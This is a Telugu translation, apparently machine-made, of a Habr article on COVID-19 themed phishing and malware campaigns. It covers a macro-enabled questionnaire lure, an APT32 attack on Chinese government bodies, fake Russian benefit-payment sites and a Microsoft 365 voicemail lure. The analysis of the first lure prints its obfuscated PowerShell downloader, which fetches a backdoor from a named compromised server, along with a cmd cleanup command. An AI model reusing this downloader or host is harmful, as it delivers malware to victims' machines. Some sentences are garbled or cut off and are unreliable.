అంటువ్యాధికి సంబంధించిన ప్రతిదానిపై తీవ్ర ఆసక్తి ఉన్న వినియోగదారులకు మరింత ఎక్కువ బెదిరింపులను సృష్టిస్తూ, దాడి చేసేవారు COVID-19 అంశాన్ని ఉపయోగించుకోవడం కొనసాగిస్తున్నారు. IN
లో గుర్తుంచుకోండి
మీరు COVID-19 కోసం ఉచిత పరీక్ష చేయాలనుకుంటున్నారా?
కరోనావైరస్ నేపథ్య ఫిషింగ్ యొక్క మరొక ముఖ్యమైన ఉదాహరణ
మాక్రోలను ఎనేబుల్ చేయడానికి చాలా మంది వినియోగదారులను ఒప్పించడం కూడా సులభం. దీన్ని చేయడానికి, ఒక ప్రామాణిక ట్రిక్ ఉపయోగించబడింది: ప్రశ్నాపత్రాన్ని పూరించడానికి, మీరు మొదట మాక్రోలను ప్రారంభించాలి, అంటే మీరు VBA స్క్రిప్ట్ని అమలు చేయాలి.
మీరు చూడగలిగినట్లుగా, VBA స్క్రిప్ట్ ప్రత్యేకంగా యాంటీవైరస్ల నుండి ముసుగు చేయబడింది.
Windows డిఫాల్ట్ “అవును” సమాధానాన్ని ఆమోదించడానికి ముందు అప్లికేషన్ /T <సెకనులు> వేచి ఉండే వెయిట్ ఫీచర్ని కలిగి ఉంది. మా విషయంలో, తాత్కాలిక ఫైల్లను తొలగించే ముందు స్క్రిప్ట్ 65 సెకన్లు వేచి ఉంది:
cmd.exe /C choice /C Y /N /D Y /T 65 & Del C:UsersPublictmpdirtmps1.bat & del C:UsersPublic1.txt
మరియు వేచి ఉండగా, మాల్వేర్ డౌన్లోడ్ చేయబడింది. దీని కోసం ప్రత్యేక PowerShell స్క్రిప్ట్ ప్రారంభించబడింది:
cmd /C powershell -Command ""(New-Object Net.WebClient).DownloadFile([System.Text.Encoding]::ASCII.GetString([System.Convert]: :FromBase64String('aHR0cDovL2F1dG9tYXRpc2NoZXItc3RhdWJzYXVnZXIuY29tL2ZlYXR1cmUvNzc3Nzc3LnBuZw==')), [System.Text.Encoding]::ASCII.GetString([System.Convert]::FromBase64String('QzpcVXNlcnNcUHVibGljXHRtcGRpclxmaWxl')) + '1' + '.e' + 'x' + 'e') >C:UsersPublic1.txt
Base64 విలువను డీకోడ్ చేసిన తర్వాత, PowerShell స్క్రిప్ట్ జర్మనీ నుండి గతంలో హ్యాక్ చేయబడిన వెబ్ సర్వర్లో ఉన్న బ్యాక్డోర్ను డౌన్లోడ్ చేస్తుంది:
http://automatischer-staubsauger.com/feature/777777.png
మరియు దానిని పేరుతో సేవ్ చేస్తుంది:
C:UsersPublictmpdirfile1.exe
ఫోల్డర్ ‘C:UsersPublictmpdir’
కమాండ్ను కలిగి ఉన్న 'tmps1.bat' ఫైల్ను అమలు చేస్తున్నప్పుడు తొలగించబడుతుంది cmd /c mkdir ""C:UsersPublictmpdir"".
ప్రభుత్వ సంస్థలపై లక్ష్యంగా దాడి
అదనంగా, FireEye విశ్లేషకులు ఇటీవల వుహాన్లోని ప్రభుత్వ నిర్మాణాలను, అలాగే చైనా అత్యవసర నిర్వహణ మంత్రిత్వ శాఖను లక్ష్యంగా చేసుకున్న APT32 దాడిని నివేదించారు. పంపిణీ చేయబడిన RTFలలో ఒకటి న్యూయార్క్ టైమ్స్ కథనానికి లింక్ను కలిగి ఉంది
ఆసక్తికరంగా, వైరస్టోటల్ ప్రకారం, గుర్తించే సమయంలో, యాంటీవైరస్లు ఏవీ ఈ ఉదాహరణను గుర్తించలేదు.
అధికారిక వెబ్సైట్లు డౌన్లో ఉన్నప్పుడు
ఫిషింగ్ దాడికి అత్యంత అద్భుతమైన ఉదాహరణ మరుసటి రోజు రష్యాలో జరిగింది. దీనికి కారణం 3 నుండి 16 సంవత్సరాల వయస్సు పిల్లలకు దీర్ఘకాలంగా ఎదురుచూస్తున్న ప్రయోజనం యొక్క నియామకం. మే 12, 2020న దరఖాస్తులను స్వీకరించడం ప్రారంభించినట్లు ప్రకటించినప్పుడు, లక్షలాది మంది దీర్ఘకాలంగా ఎదురుచూస్తున్న సహాయం కోసం స్టేట్ సర్వీసెస్ వెబ్సైట్కి చేరుకున్నారు మరియు ప్రొఫెషనల్ DDoS దాడి కంటే అధ్వాన్నంగా పోర్టల్ను తీసుకువచ్చారు. "ప్రభుత్వ సేవలు దరఖాస్తుల ప్రవాహాన్ని తట్టుకోలేవు" అని అధ్యక్షుడు చెప్పినప్పుడు, ప్రజలు దరఖాస్తులను అంగీకరించడానికి ప్రత్యామ్నాయ సైట్ను ప్రారంభించడం గురించి ఆన్లైన్లో మాట్లాడటం ప్రారంభించారు.
సమస్య ఏమిటంటే, అనేక సైట్లు ఒకేసారి పని చేయడం ప్రారంభించాయి మరియు ఒకటి, posobie16.gosuslugi.ruలోని నిజమైనది, వాస్తవానికి అప్లికేషన్లను అంగీకరిస్తుంది, మరిన్ని
SearchInform నుండి సహచరులు .ru జోన్లో దాదాపు 30 కొత్త మోసపూరిత డొమైన్లను కనుగొన్నారు. ఇన్ఫోసెక్యూరిటీ మరియు సాఫ్ట్లైన్ కంపెనీ ఏప్రిల్ ప్రారంభం నుండి ఇలాంటి 70 కంటే ఎక్కువ నకిలీ ప్రభుత్వ సేవా వెబ్సైట్లను ట్రాక్ చేశాయి. వాటి సృష్టికర్తలు తెలిసిన చిహ్నాలను తారుమారు చేస్తారు మరియు గోసుస్లుగి, గోసుస్లుగి-16, వైప్లాటీ, కోవిడ్-వైప్లాటీ, పోసోబీ మొదలైన పదాల కలయికలను కూడా ఉపయోగిస్తారు.
హైప్ మరియు సోషల్ ఇంజనీరింగ్
ఈ ఉదాహరణలన్నీ అటాకర్లు కరోనావైరస్ అంశాన్ని విజయవంతంగా మానిటైజ్ చేస్తున్నాయని మాత్రమే నిర్ధారిస్తాయి. మరియు ఎక్కువ సామాజిక ఉద్రిక్తత మరియు మరింత అస్పష్టమైన సమస్యలు, స్కామర్లు ముఖ్యమైన డేటాను దొంగిలించడానికి, వ్యక్తులను వారి స్వంత డబ్బును విడిచిపెట్టమని లేదా మరిన్ని కంప్యూటర్లను హ్యాక్ చేయడానికి ఎక్కువ అవకాశాలు ఉంటాయి.
మరియు మహమ్మారి సంసిద్ధత లేని వ్యక్తులను సామూహికంగా ఇంటి నుండి పని చేయమని బలవంతం చేసింది, వ్యక్తిగతంగా మాత్రమే కాకుండా కార్పొరేట్ డేటా కూడా ప్రమాదంలో ఉంది. ఉదాహరణకు, ఇటీవల మైక్రోసాఫ్ట్ 365 (గతంలో ఆఫీస్ 365) వినియోగదారులు కూడా ఫిషింగ్ దాడికి గురయ్యారు. అక్షరాలకు అటాచ్మెంట్లుగా ప్రజలు భారీ “తప్పిపోయిన” వాయిస్ సందేశాలను అందుకున్నారు. అయితే, ఫైళ్లు నిజానికి దాడి బాధితులను పంపిన HTML పేజీ
మూలం: www.habr.com